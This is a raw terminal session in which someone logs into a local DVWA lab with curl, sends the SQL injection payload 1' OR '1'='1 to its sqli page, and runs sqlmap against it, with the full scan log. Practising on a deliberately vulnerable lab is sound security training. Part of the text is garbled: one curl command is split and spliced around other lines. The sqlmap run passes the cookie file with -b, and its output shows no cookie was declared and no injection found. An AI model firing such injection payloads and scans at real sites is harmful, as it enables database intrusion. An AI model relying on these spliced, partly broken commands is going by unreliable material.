# show cookie file and PHPSESSID (you created this earlier)
pwd
ls -l cookies.txt
grep -i PHPSESSID cookies.txt || cat cookies.txt

# check the SQLi page status using that cookie
curl -s -I -b cookies.txt "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" | sed -n '1,8p'

curl -ls -l /tmp/sqli_test.html
head -n 60 /tmp/sqli_test.html
s -b cookies.txt "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20OR%20%271%27=%271&Submit=Submit" -o /tmp/sqli_test.html

ls -l /tmp/sqli_test.html
head -n 60 /tmp/sqli_test.html

firefox /tmp/sqli_test.html & disown

xdg-open /tmp/sqli_test.html 2>/dev/null || echo "Saved /tmp/sqli_test.html — open it in the VM browser"


curl -s -c cookies.txt -d "username=admin&password=password&Login=Login" "http://127.0.0.1/dvwa/login.php" > /dev/null
curl -s -b cookies.txt -c cookies.txt -d "security=low&seclev_submit=Submit" "http://127.0.0.1/dvwa/security.php" > /dev/null

curl -s -I -b cookies.txt "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20OR%20%271%27=%271&Submit=Submit" | sed -n '1,20p'



sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
  -b cookies.txt -p id --batch --level=3 --risk=2 --dbs | tee sqlmap-dbs.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:24:07 /2025-09-28/

[14:24:07] [INFO] testing connection to the target URL
got a 302 redirect to 'http://127.0.0.1/dvwa/login.php'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('security=impossible;PHPSESSID=970f32405d3...7b67fa9191'). Do you want to use those [Y/n] Y
[14:24:07] [INFO] testing if the target URL content is stable
[14:24:08] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[14:24:08] [INFO] testing for SQL injection on GET parameter 'id'
[14:24:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:24:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[14:24:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[14:24:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:24:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[14:24:10] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:24:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[14:24:11] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[14:24:12] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[14:24:13] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[14:24:13] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:24:13] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[14:24:13] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[14:24:13] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[14:24:13] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[14:24:13] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[14:24:13] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[14:24:13] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[14:24:13] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[14:24:13] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[14:24:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[14:24:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[14:24:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[14:24:14] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[14:24:14] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[14:24:14] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[14:24:14] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[14:24:14] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[14:24:15] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[14:24:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:24:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:24:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:24:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:24:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:24:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:24:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[14:24:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[14:24:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:24:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[14:24:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[14:24:17] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[14:24:18] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[14:24:18] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[14:24:18] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[14:24:18] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:24:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[14:24:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[14:24:19] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[14:24:19] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[14:24:19] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[14:24:19] [INFO] testing 'Oracle error-based - Parameter replace'
[14:24:19] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[14:24:19] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[14:24:19] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[14:24:19] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[14:24:19] [INFO] testing 'Generic inline queries'
[14:24:19] [INFO] testing 'MySQL inline queries'
[14:24:19] [INFO] testing 'PostgreSQL inline queries'
[14:24:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:24:19] [INFO] testing 'Oracle inline queries'
[14:24:19] [INFO] testing 'SQLite inline queries'
[14:24:19] [INFO] testing 'Firebird inline queries'
[14:24:19] [INFO] testing 'ClickHouse inline queries'
[14:24:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:24:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[14:24:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[14:24:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[14:24:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:24:20] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[14:24:20] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[14:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[14:24:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:24:21] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[14:24:21] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[14:24:21] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[14:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[14:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[14:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[14:24:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[14:24:22] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[14:24:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[14:24:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[14:24:22] [INFO] testing 'MySQL AND time-based blind (ELT)'
[14:24:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:24:23] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[14:24:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:24:23] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[14:24:23] [INFO] testing 'Oracle AND time-based blind'
[14:24:23] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[14:24:24] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[14:24:24] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[14:24:24] [INFO] testing 'Informix AND time-based blind (heavy query)'
[14:24:24] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[14:24:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[14:24:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[14:24:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[14:24:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[14:24:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[14:24:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[14:24:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[14:24:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[14:24:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[14:24:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:24:25] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[14:24:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:24:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[14:24:26] [WARNING] GET parameter 'id' does not seem to be injectable
[14:24:26] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 14:24:26 /2025-09-28/
